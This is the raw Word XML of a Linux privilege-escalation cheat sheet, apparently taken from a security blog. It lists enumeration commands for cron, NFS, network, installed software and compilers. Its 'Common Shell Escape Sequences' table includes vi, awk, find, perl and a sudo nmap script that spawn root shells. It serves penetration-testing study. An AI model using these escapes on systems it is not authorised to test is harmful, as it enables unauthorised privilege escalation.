      <w:tr w:rsidR="00245CC9" w:rsidRPr="00245CC9" w14:paraId="0A385952" w14:textId="77777777" w:rsidTr="00245CC9"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801266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cat /etc/xinetd.conf 2&gt;/dev/null | awk '{print $7}' |xargs -r ls -la 2&gt;/dev/null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4E8B07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Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>A very ‘rough’ command to extract associated binaries from xinetd.conf and show permissions of each</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00245CC9" w:rsidRPr="00245CC9" w14:paraId="2D4355DF" w14:textId="77777777" w:rsidTr="00245CC9"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C76719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ls -la /etc/exports 2&gt;/dev/null; cat /etc/exports 2&gt;/dev/null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CAE86C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Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Permissions and contents of /etc/exports (NFS)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0B420F4D" w14:textId="77777777" w:rsidR="00245CC9" w:rsidRPr="00245CC9" w:rsidRDefault="00245CC9" w:rsidP="00245C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245CC9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0051B4CC" w14:textId="77777777" w:rsidR="00245CC9" w:rsidRPr="00245CC9" w:rsidRDefault="00245CC9" w:rsidP="00245CC9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245CC9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>Jobs/Tasks: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298"/>
        <w:gridCol w:w="5046"/>
      </w:tblGrid>
      <w:tr w:rsidR="00245CC9" w:rsidRPr="00245CC9" w14:paraId="3BB2BFFE" w14:textId="77777777" w:rsidTr="00245CC9"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91B5F2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FDFBD4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245CC9" w:rsidRPr="00245CC9" w14:paraId="3ED9635E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7C5428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crontab -l -u %username%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B5570C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Display scheduled jobs for the specified user – </w:t>
            </w:r>
            <w:r w:rsidRPr="00245CC9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Privileged command</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00245CC9" w:rsidRPr="00245CC9" w14:paraId="4C53360F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C5D83A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ls -la /etc/cron*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050310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Scheduled jobs overview (hourly, daily, monthly etc)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00245CC9" w:rsidRPr="00245CC9" w14:paraId="14791CA9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4DAE99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ls -aRl /etc/cron* | awk '$1 ~ /w.$/' 2&gt;/dev/null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2FF28E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What can ‘others’ write in /etc/cron* directories</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00245CC9" w:rsidRPr="00245CC9" w14:paraId="4ADEAB5D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4D4887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top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E42150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List of current tasks</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5B60FC8E" w14:textId="77777777" w:rsidR="00245CC9" w:rsidRPr="00245CC9" w:rsidRDefault="00245CC9" w:rsidP="00245C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245CC9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32C5BCDC" w14:textId="77777777" w:rsidR="00245CC9" w:rsidRPr="00245CC9" w:rsidRDefault="00245CC9" w:rsidP="00245CC9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245CC9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>Networking, Routing &amp; Communications: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298"/>
        <w:gridCol w:w="5046"/>
      </w:tblGrid>
      <w:tr w:rsidR="00245CC9" w:rsidRPr="00245CC9" w14:paraId="77C6507F" w14:textId="77777777" w:rsidTr="00245CC9"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EB25A0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0F65EE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245CC9" w:rsidRPr="00245CC9" w14:paraId="3E600794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0B0DB4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/sbin/ifconfig -a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1965B7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List all network interfaces</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00245CC9" w:rsidRPr="00245CC9" w14:paraId="038B1C35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0F9A67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cat /etc/network/interfaces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A30888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As above</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00245CC9" w:rsidRPr="00245CC9" w14:paraId="6655B0C5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C5C5B8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arp -a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3EDA9D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Display ARP communications</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00245CC9" w:rsidRPr="00245CC9" w14:paraId="63291AE1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6B5973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route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534920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Display route information</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00245CC9" w:rsidRPr="00245CC9" w14:paraId="7472EC07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F90F4E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cat /etc/resolv.conf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CCF228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Show configured DNS sever addresses</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00245CC9" w:rsidRPr="00245CC9" w14:paraId="0499BA09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D5C05A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lastRenderedPageBreak/>
              <w:t>netstat -antp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41279E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List all TCP sockets and related PIDs (-p </w:t>
            </w:r>
            <w:r w:rsidRPr="00245CC9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Privileged command</w:t>
            </w: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</w:tr>
      <w:tr w:rsidR="00245CC9" w:rsidRPr="00245CC9" w14:paraId="1BB4F3E2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829263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netstat -anup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368C65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List all UDP sockets and related PIDs (-p </w:t>
            </w:r>
            <w:r w:rsidRPr="00245CC9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Privileged command</w:t>
            </w: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</w:tr>
      <w:tr w:rsidR="00245CC9" w:rsidRPr="00245CC9" w14:paraId="35C61044" w14:textId="77777777" w:rsidTr="00245CC9"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FCDBE1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iptables -L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8BF1C0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List rules – </w:t>
            </w:r>
            <w:r w:rsidRPr="00245CC9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Privileged command</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00245CC9" w:rsidRPr="00245CC9" w14:paraId="2BA8A5E8" w14:textId="77777777" w:rsidTr="00245CC9"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6ADF6B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cat /etc/services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09AFC3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View port numbers/services mappings</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7FF1757E" w14:textId="77777777" w:rsidR="00245CC9" w:rsidRPr="00245CC9" w:rsidRDefault="00245CC9" w:rsidP="00245C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245CC9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D355629" w14:textId="77777777" w:rsidR="00245CC9" w:rsidRPr="00245CC9" w:rsidRDefault="00245CC9" w:rsidP="00245CC9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245CC9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>Programs Installed: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298"/>
        <w:gridCol w:w="5046"/>
      </w:tblGrid>
      <w:tr w:rsidR="00245CC9" w:rsidRPr="00245CC9" w14:paraId="45A2C7AE" w14:textId="77777777" w:rsidTr="00245CC9"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37589C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4F19F0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245CC9" w:rsidRPr="00245CC9" w14:paraId="2A1B4F9E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D34098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dpkg -l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61CDA8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Installed packages (Debian)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00245CC9" w:rsidRPr="00245CC9" w14:paraId="31703073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CA32F7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rpm -qa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123461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Installed packages (Red Hat)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00245CC9" w:rsidRPr="00245CC9" w14:paraId="265BA1C2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FF82FF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sudo -V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513498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Sudo version – does an exploit exist?</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00245CC9" w:rsidRPr="00245CC9" w14:paraId="64738A8D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595097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httpd -v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7584C7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Apache version</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00245CC9" w:rsidRPr="00245CC9" w14:paraId="7FB5B1DD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972F45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apache2 -v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FD410F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As above</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00245CC9" w:rsidRPr="00245CC9" w14:paraId="3F8DFF07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756E2F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apache2ctl (or apachectl) -M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10E780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List loaded Apache modules</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00245CC9" w:rsidRPr="00245CC9" w14:paraId="2144D3EF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7D8E1A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mysql --version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C15E1F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Installed MYSQL version details</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00245CC9" w:rsidRPr="00245CC9" w14:paraId="773E93D5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833749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psql -V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ECE5F5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Installed Postgres version details</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00245CC9" w:rsidRPr="00245CC9" w14:paraId="2DD76852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BA5C8C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perl -v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7D3E9A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Installed Perl version details</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00245CC9" w:rsidRPr="00245CC9" w14:paraId="6FE69780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C9EB7B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java -version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5B916B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Installed Java version details</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00245CC9" w:rsidRPr="00245CC9" w14:paraId="77FC8F0E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4EFD56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python --version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59C58C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Installed Python version details</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00245CC9" w:rsidRPr="00245CC9" w14:paraId="1EEE49C9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090E63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ruby -v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79C103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Installed Ruby version details</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00245CC9" w:rsidRPr="00245CC9" w14:paraId="23DED644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91789D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find / -name %program_name% 2&gt;/dev/null</w:t>
            </w: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 (i.e. nc, netcat, wget, nmap etc)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CCFBA7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Locate ‘useful’ programs (netcat, wget etc)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00245CC9" w:rsidRPr="00245CC9" w14:paraId="560CBE3A" w14:textId="77777777" w:rsidTr="00245CC9"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CEA2B4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which %program_name%</w:t>
            </w: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 (i.e. nc, netcat, wget, nmap etc)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44AF7B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As above</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00245CC9" w:rsidRPr="00245CC9" w14:paraId="3DD1B5F0" w14:textId="77777777" w:rsidTr="00245CC9"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EA87EB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dpkg --list 2&gt;/dev/null| grep compiler |grep -v decompiler 2&gt;/dev/null &amp;&amp; yum </w:t>
            </w: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lastRenderedPageBreak/>
              <w:t>list installed 'gcc*' 2&gt;/dev/null| grep gcc 2&gt;/dev/null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6D1BD6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List available compilers</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00245CC9" w:rsidRPr="00245CC9" w14:paraId="5D5DDBF0" w14:textId="77777777" w:rsidTr="00245CC9"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3D7FD2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cat /etc/apache2/envvars 2&gt;/dev/null |grep -i 'user|group' |awk '{sub(/.*export /,"")}1'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5D67A5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Which account is Apache running as</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="74CB6C76" w14:textId="77777777" w:rsidR="00245CC9" w:rsidRPr="00245CC9" w:rsidRDefault="00245CC9" w:rsidP="00245C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245CC9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B0CE8BF" w14:textId="77777777" w:rsidR="00245CC9" w:rsidRPr="00245CC9" w:rsidRDefault="00245CC9" w:rsidP="00245CC9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245CC9">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>Common Shell Escape Sequences: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298"/>
        <w:gridCol w:w="5046"/>
      </w:tblGrid>
      <w:tr w:rsidR="00245CC9" w:rsidRPr="00245CC9" w14:paraId="46AC2CD1" w14:textId="77777777" w:rsidTr="00245CC9"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49C738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6C9566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Program(s)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00245CC9" w:rsidRPr="00245CC9" w14:paraId="0683F8A0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4021B2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:!bash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598659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vi, vim</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00245CC9" w:rsidRPr="00245CC9" w14:paraId="36D18A09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E5C202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:set shell=/bin/bash:shell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507CD2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vi, vim</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00245CC9" w:rsidRPr="00245CC9" w14:paraId="15F6DAF6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A95DF4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!bash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861595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man, more, less</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00245CC9" w:rsidRPr="00245CC9" w14:paraId="5BCB26E3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3ABD13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find / -exec /usr/bin/awk 'BEGIN {system("/bin/bash")}' ; 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745418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find</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00245CC9" w:rsidRPr="00245CC9" w14:paraId="6CE6D72D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9FAA35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awk 'BEGIN {system("/bin/bash")}'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5181A1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awk</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00245CC9" w:rsidRPr="00245CC9" w14:paraId="328C6FE9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D9C372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--interactive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2BCE0C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nmap</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00245CC9" w:rsidRPr="00245CC9" w14:paraId="39191F58" w14:textId="77777777" w:rsidTr="00245CC9">
        <w:trPr>
          <w:trHeight w:val="15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AE1768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echo "os.execute('/bin/sh')" &gt; exploit.nse</w:t>
            </w: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sudo nmap --script=exploit.nse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C4E1D9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nmap (thanks to comment by anonymous below)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00245CC9" w:rsidRPr="00245CC9" w14:paraId="11A87FE6" w14:textId="77777777" w:rsidTr="00245CC9"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D440D3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perl -e 'exec "/bin/bash";'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C78790" w14:textId="77777777" w:rsidR="00245CC9" w:rsidRPr="00245CC9" w:rsidRDefault="00245CC9" w:rsidP="002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C9">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Perl</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="083F5334" w14:textId="77777777" w:rsidR="006F3807" w:rsidRDefault="006F3807">
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:sectPr w:rsidR="006F3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C9"/>
    <w:rsid w:val="00245CC9"/>
    <w:rsid w:val="006F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B289"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{19744DE5-8A7F-46F4-8D6C-BE004271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5C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C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45CC9"/>
    <w:rPr>
      <w:color w:val="0000FF"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="byline">
    <w:name w:val="byline"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00245CC9"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="author">
    <w:name w:val="author"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00245CC9"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NormalWeb">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00245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5C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5C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1420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89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ebootuser.com/?author=1" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.rebootuser.com/?p=16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1138</Words>
  <Characters>6490</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>54</Lines>
  <Paragraphs>15</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/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MA</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2019-02-03T06:25:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-02-03T06:25:00Z</dcterms:modified>
</cp:coreProperties>
</file>